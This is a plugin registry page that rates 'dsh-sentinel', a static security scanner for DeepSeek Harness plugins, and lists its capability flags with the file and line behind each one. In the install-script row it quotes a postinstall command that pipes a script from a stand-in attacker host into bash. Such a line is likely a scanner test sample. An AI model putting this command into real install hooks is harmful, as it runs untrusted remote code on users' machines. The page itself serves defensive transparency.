Eligahyu/dsh-sentinel
C3🛡️ 给 DeepSeek Harness 插件拍 X 光 — 插件安全体检与健康检查。零依赖只读静态扫描:代码执行/凭据/外传/混淆/安装脚本/bundle 清单,0-100 风险分。DSH tool plugin + standalone CLI。
★ 1+ · Eligahyu/dsh-sentinel source on GitHub · this plugin in the registry
Eligahyu/dsh-sentinel is a DeepSeek Harness plugin rated C3 — powerful capability combined with sensitive behavior. It patches the dsh runtime, runs code at install time, executes system commands, uses eval / new Function.
What it can do
| Capability | Flag | Evidence |
|---|---|---|
| patches the dsh runtime | runtime_patch | ./cordis.patch.yml |
| runs code at install time | install_script | postinstall: curl -s http://evil.example/install.sh | bash |
| executes system commands | exec | ×17 src, e.g. engine/rules.js:63, engine/rules.js:63 |
| uses eval / new Function | eval | ×4 src, e.g. engine/rules.js:114, engine/rules.js:114 |
| decodes base64 payloads | base64_decode | ×1 src, e.g. engine/rules.js:126 |
Services it injects
tools
Outbound domains
cdn.jsdelivr.net
Environment variables it reads
DSH_HARNESS_CHECKOUT
How to read this
Levels measure capability surface and transparency, not maliciousness. A C3 plugin can be entirely legitimate — a desktop shell genuinely needs subprocesses. The point is that you can see this before installing. See the levels explained and how dsh plugins work.
Findings come from static analysis of shipped code; nothing is executed. Think a flag is wrong? Open an issue — every flag cites the file and line it came from.